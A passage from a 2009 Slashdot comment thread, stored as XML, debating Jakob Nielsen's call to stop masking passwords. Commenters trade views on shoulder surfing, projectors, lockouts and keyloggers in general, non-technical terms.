Once you get the screenshots , the machine is already compromised to the point that it does n't matter.And on that note , once you compromise the machine to take screenshots , there are far more effective malware packages out there to install than just a screenshot snagger .</tokentext>
<sentencetext>I can do it for linux and Windows pretty quickly, not sure about OS X, but I can do it on FreeBSD or any X server really.All I need is to get you running a process that does my dirty work in Windows, certainly not difficult.
With an X server involved all I need to do is get an app that can connect to your X server and sniffing becomes easy.
Failing that, in both Windows and most unix flavors I can always just futz with your user profile and use LD\_PRELOAD to make sure I see all your stdio.
Don't think its possible?
Have you used screen?
It doesn't preload or anything because its not trying to go unnoticed.Its only slightly more difficult to get keyboard characters than it is to get screenshots after you've got to the point where you can do the screeenshots.
Once you get the screenshots, the machine is already compromised to the point that it doesn't matter.And on that note, once you compromise the machine to take screenshots, there are far more effective malware packages out there to install than just a screenshot snagger.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471355</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245921300000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The problem is that most "criminals" aren't "truly skilled". It's easier to read a word off of a computer screen than it is to follow the fingers of a fast typist.</p><p>There are many, many more lazy "hackers" that will commit a crime of opportunity than serious hardcore hackers who will actively seek out your password. These are the people this protects you from. If someone really wants your password they will figure out a way to get it.</p></htmltext>
<tokenext>The problem is that most " criminals " are n't " truly skilled " .
It 's easier to read a word off of a computer screen than it is to follow the fingers of a fast typist.There are many , many more lazy " hackers " that will commit a crime of opportunity than serious hardcore hackers who will actively seek out your password .
These are the people this protects you from .
If someone really wants your password they will figure out a way to get it .</tokentext>
<sentencetext>The problem is that most "criminals" aren't "truly skilled".
It's easier to read a word off of a computer screen than it is to follow the fingers of a fast typist.There are many, many more lazy "hackers" that will commit a crime of opportunity than serious hardcore hackers who will actively seek out your password.
These are the people this protects you from.
If someone really wants your password they will figure out a way to get it.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475721</id>
	<title>People can't read</title>
	<author>Anonymous</author>
	<datestamp>1245938760000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Read the ENTIRE article. Sure the headline reads "Stop Password Masking (but that's marketing), later he points out why and even some later he says:</p><p>"Yes, users are sometimes truly at risk of having bystanders spy on their passwords, such as when they're using an Internet cafe. It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default. In cases where there's a tension between security and usability, sometimes security should win."</p><p>So, yes, he's right.</p></htmltext>
<tokenext>Read the ENTIRE article .
Sure the headline reads " Stop Password Masking ( but that 's marketing ) , later he points out why and even some later he says : " Yes , users are sometimes truly at risk of having bystanders spy on their passwords , such as when they 're using an Internet cafe .
It 's therefore worth offering them a checkbox to have their passwords masked ; for high-risk applications , such as bank accounts , you might even check this box by default .
In cases where there 's a tension between security and usability , sometimes security should win .
" So , yes , he 's right .</tokentext>
<sentencetext>Read the ENTIRE article.
Sure the headline reads "Stop Password Masking (but that's marketing), later he points out why and even some later he says:"Yes, users are sometimes truly at risk of having bystanders spy on their passwords, such as when they're using an Internet cafe.
It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default.
In cases where there's a tension between security and usability, sometimes security should win.
"So, yes, he's right.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471449</id>
	<title>Office meeting</title>
	<author>space\_jake</author>
	<datestamp>1245921540000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>This man has obviously never had to log into a machine or remote console on a PC during an office meeting that is being projected for others to see.  Bad time for password "shitcockballs"</htmltext>
<tokenext>This man has obviously never had to log into a machine or remote console on a PC during an office meeting that is being projected for others to see .
Bad time for password " shitcockballs "</tokentext>
<sentencetext>This man has obviously never had to log into a machine or remote console on a PC during an office meeting that is being projected for others to see.
Bad time for password "shitcockballs"</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471225</id>
	<title>Re:Two words</title>
	<author>mwvdlee</author>
	<datestamp>1245920880000</datestamp>
	<modclass>Funny</modclass>
	<modscore>5</modscore>
	<htmltext><p><div class="quote"><p>Most websites (and many other applications) mask passwords as users type them, and thereby theoretically prevent miscreants from looking over users' shoulders. Of course, a truly skilled criminal can simply look at the keyboard and note which keys are being pressed. So, password masking doesn't even protect fully against snoopers.</p></div><p>Might as well just put all my expensive electronics on the front lawn, since a truly skilled burglar can simply pick the lock and steal it anyway. So, keeping your valuables behind closed doors doesn't even protect fully against theft. It sure as hell makes it more difficult for casual thieves though, which is probably nearly all of them.</p><p><div class="quote"><p>More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.</p></div><p>Not all of us have those nice cushy jobs Mr. Nielsen has, where we have our very own office. Roughly 99.9993\% of office workers have colleagues. I guess Mr. Nielsen is just a tad detached from reality here.</p></div>
	</htmltext>
<tokenext>Most websites ( and many other applications ) mask passwords as users type them , and thereby theoretically prevent miscreants from looking over users ' shoulders .
Of course , a truly skilled criminal can simply look at the keyboard and note which keys are being pressed .
So , password masking does n't even protect fully against snoopers.Might as well just put all my expensive electronics on the front lawn , since a truly skilled burglar can simply pick the lock and steal it anyway .
So , keeping your valuables behind closed doors does n't even protect fully against theft .
It sure as hell makes it more difficult for casual thieves though , which is probably nearly all of them.More importantly , there 's usually nobody looking over your shoulder when you log in to a website .
It 's just you , sitting all alone in your office , suffering reduced usability to protect against a non-issue.Not all of us have those nice cushy jobs Mr. Nielsen has , where we have our very own office .
Roughly 99.9993 \ % of office workers have colleagues .
I guess Mr. Nielsen is just a tad detached from reality here .</tokentext>
<sentencetext>Most websites (and many other applications) mask passwords as users type them, and thereby theoretically prevent miscreants from looking over users' shoulders.
Of course, a truly skilled criminal can simply look at the keyboard and note which keys are being pressed.
So, password masking doesn't even protect fully against snoopers.Might as well just put all my expensive electronics on the front lawn, since a truly skilled burglar can simply pick the lock and steal it anyway.
So, keeping your valuables behind closed doors doesn't even protect fully against theft.
It sure as hell makes it more difficult for casual thieves though, which is probably nearly all of them.More importantly, there's usually nobody looking over your shoulder when you log in to a website.
It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.Not all of us have those nice cushy jobs Mr. Nielsen has, where we have our very own office.
Roughly 99.9993\% of office workers have colleagues.
I guess Mr. Nielsen is just a tad detached from reality here.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473271</id>
	<title>Re:Runaway security</title>
	<author>Anonymous</author>
	<datestamp>1245927840000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I care who sees my password at home.  My kids have a near photographic memory for text (thanks, hyperlexia *sigh*) and 6 years old is toooo young to be rootkitting IMO.</p></htmltext>
<tokenext>I care who sees my password at home .
My kids have a near photographic memory for text ( thanks , hyperlexia * sigh * ) and 6 years old is toooo young to be rootkitting IMO .</tokentext>
<sentencetext>I care who sees my password at home.
My kids have a near photographic memory for text (thanks, hyperlexia *sigh*) and 6 years old is toooo young to be rootkitting IMO.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474347</id>
	<title>Mod parent smart</title>
	<author>Anonymous</author>
	<datestamp>1245932220000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>That's exactly what I thought when I saw this article: password masking makes shoulder surfing a little harder.  With this recommendation Nielsen has shown himself to be a first-class retard who doesn't really know anything about usability.  Why do people listen to this imbecile?</p></htmltext>
<tokenext>That 's exactly what I thought when I saw this article : password masking makes shoulder surfing a little harder .
With this recommendation Nielsen has shown himself to be a first-class retard who does n't really know anything about usability .
Why do people listen to this imbecile ?</tokentext>
<sentencetext>That's exactly what I thought when I saw this article: password masking makes shoulder surfing a little harder.
With this recommendation Nielsen has shown himself to be a first-class retard who doesn't really know anything about usability.
Why do people listen to this imbecile?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471637</id>
	<title>RTFA</title>
	<author>thethibs</author>
	<datestamp>1245922200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>This summary is false to the article. ("It's time to show <b>most</b> passwords in clear text as users type them")</p><p>The knee jerk reactions by people who read the summary but not the article have all been addressed in the article. </p></htmltext>
<tokenext>This summary is false to the article .
( " It 's time to show most passwords in clear text as users type them " ) The knee jerk reactions by people who read the summary but not the article have all been addressed in the article .</tokentext>
<sentencetext>This summary is false to the article.
("It's time to show most passwords in clear text as users type them")The knee jerk reactions by people who read the summary but not the article have all been addressed in the article. </sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28485403</id>
	<title>Re:Two words</title>
	<author>logpoacher</author>
	<datestamp>1246041180000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>You kidding? Apparently I've even got windows on my computer!</htmltext>
<tokenext>You kidding ?
Apparently I 've even got windows on my computer !</tokentext>
<sentencetext>You kidding?
Apparently I've even got windows on my computer!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471789</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245921120000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>4</modscore>
	<htmltext>About the only thing that requires a complex password for most people is work. At work, most everyone is too scared of being fired to really mess with people's accounts. Really the only point of passwords there is to keep out network attacks or so people can work at home. If someone can't remember 6-8 characters with a number thrown in there for good measure, perhaps they should not be on the internet.</htmltext>
<tokenext>About the only thing that requires a complex password for most people is work .
At work , most everyone is too scared of being fired to really mess with people 's accounts .
Really the only point of passwords there is to keep out network attacks or so people can work at home .
If someone ca n't remember 6-8 characters with a number thrown in there for good measure , perhaps they should not be on the internet .</tokentext>
<sentencetext>About the only thing that requires a complex password for most people is work.
At work, most everyone is too scared of being fired to really mess with people's accounts.
Really the only point of passwords there is to keep out network attacks or so people can work at home.
If someone can't remember 6-8 characters with a number thrown in there for good measure, perhaps they should not be on the internet.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471109</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472505</id>
	<title>This is obviously a joke.</title>
	<author>FaxeTheCat</author>
	<datestamp>1245924900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>After having skimmed through the referenced blog, it is obvious that the author is either joking or a spotty teenager. Let's hope he is just joking.<br> <br>
Quote: "Password masking has become common for no reasons other than (a) it's easy to do, and (b) <b> it was the default in the Web's early days.</b>"<br> <br>
"Web's early days"? I can clearly remember using passwords a full decade before the Web was invented. And I will bet there are people lurking around here who can beat me by a couple of decades. <br> <br>Do we even need to discuss this one? Looks like the "Hollow earth" theory of IT secuity to me...</div>
	</htmltext>
<tokenext>After having skimmed through the referenced blog , it is obvious that the author is either joking or a spotty teenager .
Let 's hope he is just joking .
Quote : " Password masking has become common for no reasons other than ( a ) it 's easy to do , and ( b ) it was the default in the Web 's early days .
" " Web 's early days " ?
I can clearly remember using passwords a full decade before the Web was invented .
And I will bet there are people lurking around here who can beat me by a couple of decades .
Do we even need to discuss this one ?
Looks like the " Hollow earth " theory of IT secuity to me.. .</tokentext>
<sentencetext>After having skimmed through the referenced blog, it is obvious that the author is either joking or a spotty teenager.
Let's hope he is just joking.
Quote: "Password masking has become common for no reasons other than (a) it's easy to do, and (b)  it was the default in the Web's early days.
" 
"Web's early days"?
I can clearly remember using passwords a full decade before the Web was invented.
And I will bet there are people lurking around here who can beat me by a couple of decades.
Do we even need to discuss this one?
Looks like the "Hollow earth" theory of IT secuity to me...
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28481367</id>
	<title>this guy is an idiot</title>
	<author>Hillie</author>
	<datestamp>1246027560000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The fact that he's a so-called security expert REALLY scares me.</p><p>I hate it when products/software don't mask passwords. like the Wii. Type in your credit card number or wi-fi password so everyone looking through your window or over your shoulder can see it SWEET.</p><p>This guy must be related to the guys who allow web developers to develop web apps that send you your password to you in plain text through e-mail when you sign up, or worse, once a month in a newsletter.</p></htmltext>
<tokenext>The fact that he 's a so-called security expert REALLY scares me.I hate it when products/software do n't mask passwords .
like the Wii .
Type in your credit card number or wi-fi password so everyone looking through your window or over your shoulder can see it SWEET.This guy must be related to the guys who allow web developers to develop web apps that send you your password to you in plain text through e-mail when you sign up , or worse , once a month in a newsletter .</tokentext>
<sentencetext>The fact that he's a so-called security expert REALLY scares me.I hate it when products/software don't mask passwords.
like the Wii.
Type in your credit card number or wi-fi password so everyone looking through your window or over your shoulder can see it SWEET.This guy must be related to the guys who allow web developers to develop web apps that send you your password to you in plain text through e-mail when you sign up, or worse, once a month in a newsletter.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471867</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245922920000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>If Stephen Hawking says something about <b>biology</b>, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</p></div><p>Fixed.</p></div>
	</htmltext>
<tokenext>If Stephen Hawking says something about biology , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field.Fixed .</tokentext>
<sentencetext>If Stephen Hawking says something about biology, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.Fixed.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472637</id>
	<title>Keep it masked</title>
	<author>Anonymous</author>
	<datestamp>1245925380000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>This is a stupid argument.  Passwords need to be masked.</p><p>Lets say your at a friends house and you use his/her computer to check your email account or facebook account to show them something.  If they are sitting next to you, having password masking helps.  Or everytime you'll have to ask your friend to turn away.</p><p>Of course that little inconvenience might be ok, but what about if it was a girlfriend or spouse sitting next to you?  If you ask them to look away, you'll probably end up with an argument about why can't she know?  Let's avoid this problem by keeping passwords masked.</p></htmltext>
<tokenext>This is a stupid argument .
Passwords need to be masked.Lets say your at a friends house and you use his/her computer to check your email account or facebook account to show them something .
If they are sitting next to you , having password masking helps .
Or everytime you 'll have to ask your friend to turn away.Of course that little inconvenience might be ok , but what about if it was a girlfriend or spouse sitting next to you ?
If you ask them to look away , you 'll probably end up with an argument about why ca n't she know ?
Let 's avoid this problem by keeping passwords masked .</tokentext>
<sentencetext>This is a stupid argument.
Passwords need to be masked.Lets say your at a friends house and you use his/her computer to check your email account or facebook account to show them something.
If they are sitting next to you, having password masking helps.
Or everytime you'll have to ask your friend to turn away.Of course that little inconvenience might be ok, but what about if it was a girlfriend or spouse sitting next to you?
If you ask them to look away, you'll probably end up with an argument about why can't she know?
Let's avoid this problem by keeping passwords masked.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474123</id>
	<title>Greasemonkey script</title>
	<author>wahaa</author>
	<datestamp>1245931620000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>"Password fields are text with a green border" by JoeSimmons:<br>
<br>
<a href="http://userscripts.org/scripts/show/50622" title="userscripts.org" rel="nofollow">http://userscripts.org/scripts/show/50622</a> [userscripts.org]</htmltext>
<tokenext>" Password fields are text with a green border " by JoeSimmons : http : //userscripts.org/scripts/show/50622 [ userscripts.org ]</tokentext>
<sentencetext>"Password fields are text with a green border" by JoeSimmons:

http://userscripts.org/scripts/show/50622 [userscripts.org]</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472065</id>
	<title>Re:Why not a compromise?</title>
	<author>vertinox</author>
	<datestamp>1245923400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><i>What TFA is suggesting is probably one of the dumbest ideas I've heard since... EVER. That said, the dots are a usability issue -- I've got plenty of otherwise very smart users who screw up passwords constantly.</i></p><p>Despite what they say about Lotus Notes (its the spawn of satan), it did have that cool feature where the random icons would change as you typed your password and that when you had the right one that you could recognize that you had typed it.</p><p>Or at least it looked familiar so you knew before you pressed enter if you made a mistake.</p></htmltext>
<tokenext>What TFA is suggesting is probably one of the dumbest ideas I 've heard since... EVER. That said , the dots are a usability issue -- I 've got plenty of otherwise very smart users who screw up passwords constantly.Despite what they say about Lotus Notes ( its the spawn of satan ) , it did have that cool feature where the random icons would change as you typed your password and that when you had the right one that you could recognize that you had typed it.Or at least it looked familiar so you knew before you pressed enter if you made a mistake .</tokentext>
<sentencetext>What TFA is suggesting is probably one of the dumbest ideas I've heard since... EVER. That said, the dots are a usability issue -- I've got plenty of otherwise very smart users who screw up passwords constantly.Despite what they say about Lotus Notes (its the spawn of satan), it did have that cool feature where the random icons would change as you typed your password and that when you had the right one that you could recognize that you had typed it.Or at least it looked familiar so you knew before you pressed enter if you made a mistake.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471211</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473605</id>
	<title>Re:hunter2</title>
	<author>rawler</author>
	<datestamp>1245929400000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack". I just had to reset a users PW twice this afternoon because she locked herself out of her account. Sure, it's extra hassle but the security is worth it.</p></div><p>That's probably due to poor configuration of the security-measures. You should enforce reasonable passwords being used (the usual, at least 8 characters, with at least 1 character being a digit.) Given that, it will likely take at least 100s of attempts for an attacker, which means you should be safe allowing some 15-20 attemps from the user, which very few users actually would use up before asking for a replacement password.</p><p>If the user still fails with those attempts, maybe giving him/her a blank password is the best option, since any security is obviously too unusable for him/her anyways.</p></div>
	</htmltext>
<tokenext>Good security involves locking out the user after a certain number of attempts in order to stop a " dictionary attack " .
I just had to reset a users PW twice this afternoon because she locked herself out of her account .
Sure , it 's extra hassle but the security is worth it.That 's probably due to poor configuration of the security-measures .
You should enforce reasonable passwords being used ( the usual , at least 8 characters , with at least 1 character being a digit .
) Given that , it will likely take at least 100s of attempts for an attacker , which means you should be safe allowing some 15-20 attemps from the user , which very few users actually would use up before asking for a replacement password.If the user still fails with those attempts , maybe giving him/her a blank password is the best option , since any security is obviously too unusable for him/her anyways .</tokentext>
<sentencetext>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack".
I just had to reset a users PW twice this afternoon because she locked herself out of her account.
Sure, it's extra hassle but the security is worth it.That's probably due to poor configuration of the security-measures.
You should enforce reasonable passwords being used (the usual, at least 8 characters, with at least 1 character being a digit.
) Given that, it will likely take at least 100s of attempts for an attacker, which means you should be safe allowing some 15-20 attemps from the user, which very few users actually would use up before asking for a replacement password.If the user still fails with those attempts, maybe giving him/her a blank password is the best option, since any security is obviously too unusable for him/her anyways.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477385</id>
	<title>Easy workaround</title>
	<author>neonux</author>
	<datestamp>1245950520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Just use "******" as your password!</p><p>There, problem solved! Next!</p></htmltext>
<tokenext>Just use " * * * * * * " as your password ! There , problem solved !
Next !</tokentext>
<sentencetext>Just use "******" as your password!There, problem solved!
Next!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472359</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>fluffernutter</author>
	<datestamp>1245924360000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I have not, but I have escorted technicians into our data center who cannot know our passwords.  The screen is plainly visible but the keyboard never is.  They could see a password in open text on the screen without trying very hard, but they'd have to be quite obvious to catch me tapping keys on the keyboard, especially at the rate I type.</htmltext>
<tokenext>I have not , but I have escorted technicians into our data center who can not know our passwords .
The screen is plainly visible but the keyboard never is .
They could see a password in open text on the screen without trying very hard , but they 'd have to be quite obvious to catch me tapping keys on the keyboard , especially at the rate I type .</tokentext>
<sentencetext>I have not, but I have escorted technicians into our data center who cannot know our passwords.
The screen is plainly visible but the keyboard never is.
They could see a password in open text on the screen without trying very hard, but they'd have to be quite obvious to catch me tapping keys on the keyboard, especially at the rate I type.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470993</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471923</id>
	<title>Re:Two words</title>
	<author>BitZtream</author>
	<datestamp>1245923040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>He is an accepted as basically THE web usability expert.</p><p>He is not however recognized as even slightly clueful about security.</p></htmltext>
<tokenext>He is an accepted as basically THE web usability expert.He is not however recognized as even slightly clueful about security .</tokentext>
<sentencetext>He is an accepted as basically THE web usability expert.He is not however recognized as even slightly clueful about security.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28488565</id>
	<title>my story</title>
	<author>Anonymous</author>
	<datestamp>1246011900000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Actually, I had a coworker once, at a company that deals with security of nuclear facilities, who would try to look over my shoulder to see me type my password, but I am too fast. He even installed a keylogger when I walked away, before the screensaver w/ password kicked in, to take a bathroom break. I scan my PC daily for viruses/malware and ended up finding it before he could collect the password, and from then on I locked my PC manually before walking away. I became paranoid enough that I began checking my keyboard plug to make sure no one had installed a hardware keylogger. He eventually ended up giving up on the password stealing approach and instead looked up a vulnerability in VMWare, which I had installed to test the software we were developing to make sure it worked on a freshly installed OS and not just the dev PC. He found a zero-day vulnerability and exploited it in order to remotely launch a virus on my machine that he had written that created thousands of shortcuts and caused my computer to lock up even on a reboot. He then gloated about it and laughed as I wasted an hour recovering my system, time that could have been spent completing the software project that we needed to deliver. A month later I got laid off, and he's still there even a year and a half later.</p><p>Will not showing a password on the monitor keep you safe from shoulder surfers trying to steal your password? Yes, if you type your password quickly enough. But, it won't stop someone who is determined to ruin your day from finding a way.</p></htmltext>
<tokenext>Actually , I had a coworker once , at a company that deals with security of nuclear facilities , who would try to look over my shoulder to see me type my password , but I am too fast .
He even installed a keylogger when I walked away , before the screensaver w/ password kicked in , to take a bathroom break .
I scan my PC daily for viruses/malware and ended up finding it before he could collect the password , and from then on I locked my PC manually before walking away .
I became paranoid enough that I began checking my keyboard plug to make sure no one had installed a hardware keylogger .
He eventually ended up giving up on the password stealing approach and instead looked up a vulnerability in VMWare , which I had installed to test the software we were developing to make sure it worked on a freshly installed OS and not just the dev PC .
He found a zero-day vulnerability and exploited it in order to remotely launch a virus on my machine that he had written that created thousands of shortcuts and caused my computer to lock up even on a reboot .
He then gloated about it and laughed as I wasted an hour recovering my system , time that could have been spent completing the software project that we needed to deliver .
A month later I got laid off , and he 's still there even a year and a half later.Will not showing a password on the monitor keep you safe from shoulder surfers trying to steal your password ?
Yes , if you type your password quickly enough .
But , it wo n't stop someone who is determined to ruin your day from finding a way .</tokentext>
<sentencetext>Actually, I had a coworker once, at a company that deals with security of nuclear facilities, who would try to look over my shoulder to see me type my password, but I am too fast.
He even installed a keylogger when I walked away, before the screensaver w/ password kicked in, to take a bathroom break.
I scan my PC daily for viruses/malware and ended up finding it before he could collect the password, and from then on I locked my PC manually before walking away.
I became paranoid enough that I began checking my keyboard plug to make sure no one had installed a hardware keylogger.
He eventually ended up giving up on the password stealing approach and instead looked up a vulnerability in VMWare, which I had installed to test the software we were developing to make sure it worked on a freshly installed OS and not just the dev PC.
He found a zero-day vulnerability and exploited it in order to remotely launch a virus on my machine that he had written that created thousands of shortcuts and caused my computer to lock up even on a reboot.
He then gloated about it and laughed as I wasted an hour recovering my system, time that could have been spent completing the software project that we needed to deliver.
A month later I got laid off, and he's still there even a year and a half later.Will not showing a password on the monitor keep you safe from shoulder surfers trying to steal your password?
Yes, if you type your password quickly enough.
But, it won't stop someone who is determined to ruin your day from finding a way.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28482413</id>
	<title>Re:One word for Nielsen: Projector</title>
	<author>Cro Magnon</author>
	<datestamp>1246030980000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Heh!  Once I had trouble finding a password that fit the rather stupid rules for passwords.  By the time I got one to work, I was pretty pissed off, and I'll just say I very definitely would not have wanted to repeat it in polite company.</p></htmltext>
<tokenext>Heh !
Once I had trouble finding a password that fit the rather stupid rules for passwords .
By the time I got one to work , I was pretty pissed off , and I 'll just say I very definitely would not have wanted to repeat it in polite company .</tokentext>
<sentencetext>Heh!
Once I had trouble finding a password that fit the rather stupid rules for passwords.
By the time I got one to work, I was pretty pissed off, and I'll just say I very definitely would not have wanted to repeat it in polite company.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471285</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471315</id>
	<title>Password hashing method</title>
	<author>Anonymous</author>
	<datestamp>1245921120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Funny thing is that unmasking passwords would/could make the system more vulnerable to certain memory attacks.</p><p>On modern systems, the password itself is never stored, only the hash.  So when someone wants to login to a remote server, the local system will take the password then compute the hash. The hash is then sent to the authenticating mechanism. The mechanism will then return a pass/fail to the local system. The password is never transmitted.</p><p>Internally, different systems use different methods of calculating the hash. Some will take the plain password then run it through another function that returns the hash. For a brief moment this plain password is available in a memory dump of the system. An attacker could potentially cause the process to crash at the appropriate time and then capture the memory dump and retrieve the plain password.</p><p>To get around this, some implementations don't even store the plaintext password even temporarily. As keys are typed, the hash is recalculated with a time-based salt key. At no point is the entire password available in a memory dump.</p></htmltext>
<tokenext>Funny thing is that unmasking passwords would/could make the system more vulnerable to certain memory attacks.On modern systems , the password itself is never stored , only the hash .
So when someone wants to login to a remote server , the local system will take the password then compute the hash .
The hash is then sent to the authenticating mechanism .
The mechanism will then return a pass/fail to the local system .
The password is never transmitted.Internally , different systems use different methods of calculating the hash .
Some will take the plain password then run it through another function that returns the hash .
For a brief moment this plain password is available in a memory dump of the system .
An attacker could potentially cause the process to crash at the appropriate time and then capture the memory dump and retrieve the plain password.To get around this , some implementations do n't even store the plaintext password even temporarily .
As keys are typed , the hash is recalculated with a time-based salt key .
At no point is the entire password available in a memory dump .</tokentext>
<sentencetext>Funny thing is that unmasking passwords would/could make the system more vulnerable to certain memory attacks.On modern systems, the password itself is never stored, only the hash.
So when someone wants to login to a remote server, the local system will take the password then compute the hash.
The hash is then sent to the authenticating mechanism.
The mechanism will then return a pass/fail to the local system.
The password is never transmitted.Internally, different systems use different methods of calculating the hash.
Some will take the plain password then run it through another function that returns the hash.
For a brief moment this plain password is available in a memory dump of the system.
An attacker could potentially cause the process to crash at the appropriate time and then capture the memory dump and retrieve the plain password.To get around this, some implementations don't even store the plaintext password even temporarily.
As keys are typed, the hash is recalculated with a time-based salt key.
At no point is the entire password available in a memory dump.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473005</id>
	<title>Visuals</title>
	<author>el\_jake</author>
	<datestamp>1245926760000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>So my password will at last give a meaning, no more ********* but now the more meaningful KlYtgHjd8 - GREAT!
If this will be mandatory with visual letters I will change my password back to the trustworthy *********, no one will guess nine stars anyways, to simple to break.</htmltext>
<tokenext>So my password will at last give a meaning , no more * * * * * * * * * but now the more meaningful KlYtgHjd8 - GREAT !
